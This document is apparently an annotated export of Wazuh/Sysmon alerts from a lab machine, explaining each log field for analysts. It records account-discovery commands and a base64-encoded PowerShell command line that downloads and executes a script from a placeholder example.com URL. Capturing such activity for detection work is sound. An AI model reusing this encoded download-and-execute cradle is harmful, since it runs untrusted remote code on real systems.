data.win.eventdata.processId:  11608
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcaa-680a-930a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11676
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:54.806+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.806+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.970171
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:49.1508187Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282233
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:49.142 ProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00} ProcessId: 12028 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:49.142
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc5-680a-b10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:54.823+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.823+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.975453
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:49.7003462Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282235
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:46.658 ProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} ProcessId: 1148 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} ParentProcessId: 8908 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:46.658
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc2-680a-ae0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc1-680a-ac0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:54.872+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.872+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.983515
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:49.9158126Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282239
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:49.897 ProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} ProcessId: 1148 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_0gxqrd3j.oe2.ps1 CreationUtcTime: 2025-04-24 22:35:49.897 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:49.897
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc2-680a-ae0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0gxqrd3j.oe2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:49.897
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:55.367+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.367+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.986279
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:51.6610611Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282272
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:51.490 ProcessGuid: {94294ddc-bcc7-680a-b50a-000000000e00} ProcessId: 10700 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00} ParentProcessId: 12028 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user administrator ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:51.490
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc7-680a-b50a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
